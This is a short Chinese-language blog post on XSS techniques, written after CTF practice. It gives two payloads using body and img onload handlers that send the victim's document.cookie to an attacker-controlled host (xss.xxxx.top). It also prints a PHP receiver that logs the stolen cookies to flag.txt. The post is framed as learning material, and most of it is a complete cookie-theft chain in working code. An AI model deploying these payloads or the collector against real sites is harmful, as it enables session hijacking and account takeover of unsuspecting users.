xss的一些技巧

以前是懂了xss的原理但是对js不太熟悉,在ctfshow中学到了很多姿势,学校也开了css+javascript门课所以我就开始探索xss的新大陆。以下内容仅用于学习,请勿在自己服务器上尝试。

大体思路

image-20210420170438564

1
2
3
4
<body onload="window.location.href='http://xss.xxxx.top/xss.php?xss='+document.cookie"> </body>
<img onload="window.location.href='http://xss.xxxx.top/xss.php?xss='+document.cookie" src="http://xss.xxxx.top/xss.jpg">

onload是该标签完成加载后开始执行js代码,然后让它访问我的网站,并把它写入到我的flag.txt文件里面,之前是用的xss.pt但是我为了搞懂他的原理,搭建了一个方便我进行xss测试的环境。

1
2
3
4
5
6
<?php
    $a=$_GET['xss'];
    echo $a;
    $d=fopen("flag.txt","a");
    fwrite($d,$a."\n");
?>

然后我访问那个flag.txt文件就可以得到该用户的cookie。